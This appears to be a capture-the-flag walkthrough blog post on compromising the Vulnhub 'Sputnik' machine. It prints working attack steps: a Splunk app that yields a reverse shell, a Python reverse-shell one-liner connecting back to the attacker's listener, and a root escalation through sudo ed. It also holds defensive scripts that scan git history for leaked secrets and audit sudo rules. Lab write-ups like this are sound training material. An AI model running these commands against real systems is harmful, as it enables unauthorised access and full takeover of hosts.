Sputnik Walkthrough

Mr. Robot
Published in InfoSec Adventures
5 min read · Jul 19, 2019

Description from Vulnhub:

Sputnik is an easy level boot2root machine designed to be a challenge for security enthusiasts to learn and practice compromising machines and penetration testing.

The vulnerable machine was made as a boot2root CTF challenge for an InfoSec community wherein CTF challenges were made by hackstreetboys (a CTF team from the Philippines).

Scanning

root :: ~ » nmap -A -sC -sV -p- 192.168.42.24 
Nmap scan report for sputnik (192.168.42.24)
Host is up (0.00016s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
8089/tcp open ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2019-03-29T11:03:21
|_Not valid after: 2022-03-28T11:03:21
8191/tcp open limnerpressure?
| fingerprint-strings:
| FourOhFourRequest, GetRequest:
| HTTP/1.0 200 OK
| Connection: close
| Content-Type: text/plain
| Content-Length: 85
|_ looks like you are trying to access MongoDB over HTTP on the native driver port.
55555/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-git:
| 192.168.42.24:55555/.git/
| Git repository found!
|_ Repository description: Unnamed repository; edit this file 'description' to name the...
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Flappy Bird Game
61337/tcp open http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://sputnik:61337/en-US/account/login?return_to=%2Fen-US%2F
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 08:00:27:D8:0B:51 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

Repository inside a repository

Nmap picked up an unusual .git directory on port 55555. Let’s start with that. The .git directory pointed me to the remote repository, which you can find here: https://github.com/ameerpornillos/flappy

GitHub repository link inside the .git directory.

I quickly went through the commits and discovered a deleted secret file. One of the commits contained login information inside this file, as you can see in the picture below.

Plain text credentials left in the repository.
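A deleted secret file is exactly what a history scan of the repository catches. The following Python script is an added example (not part of the walkthrough or of the flappy repository): it parses the text of git log -p --all, reports credential-looking lines added or removed in any commit, and marks files that were deleted, since a file removed from HEAD is still recoverable from history. The sample log, its hashes and its values are constructed.

```python
import re
from dataclasses import dataclass

# Constructed sample of `git log -p --all` output, modelled on the walkthrough: a
# "secret" file with credentials is committed, then deleted. Hashes, names and
# values are made up; Author/Date headers are trimmed for brevity.
SAMPLE_LOG = """\
commit 1111111111111111111111111111111111111111
diff --git a/secret b/secret
deleted file mode 100644
--- a/secret
+++ /dev/null
@@ -1,2 +0,0 @@
-username=example_user
-password=example_password_123
commit 2222222222222222222222222222222222222222
diff --git a/secret b/secret
new file mode 100644
--- /dev/null
+++ b/secret
@@ -0,0 +1,2 @@
+username=example_user
+password=example_password_123
"""

# Crude credential pattern: key=value / key: value for common secret-ish keys.
SECRET_RE = re.compile(r"(?i)\b(pass(word)?|pwd|secret|token|api[_-]?key)\b\s*[=:]\s*\S+")


@dataclass
class Finding:
    commit: str
    path: str
    line: str
    deleted_file: bool  # True when the whole file was removed in this commit


def scan_git_log(log_text: str) -> list:
    """Walk `git log -p` output and report credential-looking lines that were
    added (+) or removed (-) in any commit. Removed lines matter just as much:
    the content is still in the object store and in every clone."""
    findings, commit, path, deleted = [], "", "", False
    for raw in log_text.splitlines():
        if raw.startswith("commit "):
            commit, path, deleted = raw.split()[1], "", False
        elif raw.startswith("diff --git "):
            path, deleted = raw.split(" b/", 1)[1], False
        elif raw.startswith("deleted file mode"):
            deleted = True
        elif raw[:1] in ("+", "-") and not raw.startswith(("+++", "---")):
            if SECRET_RE.search(raw[1:]):
                findings.append(Finding(commit, path, raw[1:].strip(), deleted))
    return findings
```

Run it against the real output of git log -p --all to list every commit that ever added or dropped a credential-looking line.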

Discovering Splunk

The only login page I found was for Splunk on port 61337. I used the found credentials to log in. I hadn’t heard of Splunk before, but here we go.

After I logged in, I started searching for Splunk-related vulnerabilities and eventually found an interesting repository on GitHub.
Link: https://github.com/TBGSecurity/splunk_shells

The idea is pretty simple. First, we have to upload a custom application (https://github.com/TBGSecurity/splunk_shells/archive/1.2.tar.gz), which basically gives us a reverse shell. The path to the menu is: “Apps > Manage Apps > Install app from file”. After that, you have to restart Splunk.

If everything is right, you should be presented with a new application.

We need one more step, and that is changing the permission of the app to “All apps”. After you have saved it, you should be ready to go.

Reverse Shell

Under “Apps > Search & Reporting”, you can find a search bar. The repository instructions cover this step as well, but I’ll show it here anyway. That search bar is now vulnerable to command injection, which you can exploit by typing:

| revshell [shell_type] [ip] [port]

More specifically, I typed the following command and got a netcat connection.

| revshell std 192.168.42.9 9898

Hypothetically, you should also be able to use Metasploit for this, but I couldn’t get it to work.

Upgrading the Shell

Let’s upgrade this barely functional shell to something more usable. It’s a bit trickier than usual, but nothing special. With the connection you get back in netcat, you can’t spawn a pseudo-TTY with Python, so I had to take one more step to get it working: I executed another reverse shell with the help of a Python one-liner.

root :: ~ » nc -lvp 9898
listening on [any] 9898 ...
connect to [192.168.42.9] from sputnik [192.168.42.24] 46214
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.42.9",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Now we have the ability to spawn a pseudo-TTY shell.

root :: ~ » nc -lvp 9999
listening on [any] 9999 ...
connect to [192.168.42.9] from sputnik [192.168.42.24] 35594
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
splunk@sputnik:/$

I actually did extensive enumeration with LinEnum, but I’ll just show you the important part: we are able to run the ed program as root.

splunk@sputnik:/$ sudo -l
[sudo] password for splunk: ameer_says_thank_you_and_good_job
Matching Defaults entries for splunk on sputnik:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User splunk may run the following commands on sputnik:
(root) /bin/ed
splunk@sputnik:/$
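The sudo -l output above can be reviewed mechanically. The following Python audit script is an added example (not from the walkthrough or from LinEnum) that parses that output, assuming the standard sudo -l layout, and flags root-level rules for binaries known to offer a shell escape, ed among them; the escape list is illustrative, not exhaustive.

```python
import re
from typing import Dict, List

# Binaries that can hand the caller an interactive shell when run under sudo.
# ed's "!command" is the one used in the walkthrough; the rest are other
# well-known editor, pager and interpreter escapes. Illustrative, not exhaustive.
SHELL_ESCAPE_BINARIES = {"ed", "vi", "vim", "nano", "less", "more", "man",
                         "awk", "find", "python", "python3", "perl", "bash", "sh"}

# The `sudo -l` output from the walkthrough, reused here as the sample input.
SUDO_L_OUTPUT = r"""Matching Defaults entries for splunk on sputnik:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User splunk may run the following commands on sputnik:
    (root) /bin/ed
"""

# One rule line: "(runas[:group]) [TAG: ...] command[, command...]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")


def parse_sudo_rules(output: str) -> List[Dict[str, object]]:
    """Return the command rules listed by `sudo -l`: run-as user, tags such as
    NOPASSWD, the command itself, and whether it is a known shell escape."""
    rules, in_commands = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_commands = True  # rule lines follow this header
            continue
        m = RULE_RE.match(line) if in_commands and line.strip() else None
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip() or "root"
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        for cmd in (c.strip() for c in m.group("cmd").split(",")):
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            rules.append({
                "runas": runas, "tags": tags, "command": cmd,
                "shell_escape": cmd == "ALL" or binary in SHELL_ESCAPE_BINARIES,
            })
    return rules


def risky_rules(output: str) -> List[str]:
    """Commands to review first: rules that run as root and give a shell."""
    return [r["command"] for r in parse_sudo_rules(output)
            if r["runas"] in ("root", "ALL") and r["shell_escape"]]
```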

Privilege Escalation to Root

You can easily spawn a Bash shell from ed. All you have to do is put an exclamation mark before the path, and that’s it!

splunk@sputnik:/$ sudo ed
[sudo] password for splunk: ameer_says_thank_you_and_good_job
!/bin/bash
root@sputnik:/# id
uid=0(root) gid=0(root) groups=0(root)

The Flag

Finally, we can print out the well-deserved root flag!

root@sputnik:~# cat flag.txt
cat flag.txt
 _________________________________________
/ Congratulations!                        \
|                                         |
| You did it!                             |
|                                         |
| Thank you for trying out this challenge |
| and hope that you learn a thing or two. |
|                                         |
| Check the flag below.                   |
|                                         |
| flag_is{w1th_gr34t_p0w3r_c0m35_w1th_gr3 |
| 4t_r3sp0ns1b1l1ty}                      |
|                                         |
| Hope you enjoy solving this challenge.  |
| :D                                      |
|                                         |
\ - ameer (from hackstreetboys)           /
 -----------------------------------------
(cowsay dragon ASCII art printed here in the original; its alignment did not survive extraction)
root@sputnik:~#

flag_is{w1th_gr34t_p0w3r_c0m35_w1th_gr34t_r3sp0ns1b1l1ty}

Before you go

Thank you for taking the time to read my walkthrough. If you found it helpful, please hit the 👏 button (up to 50x) and share it to help others with similar interests find it! Feedback is always welcome! 🙏


Self-taught developer with an interest in Offensive Security. I regularly play on Vulnhub and Hack The Box.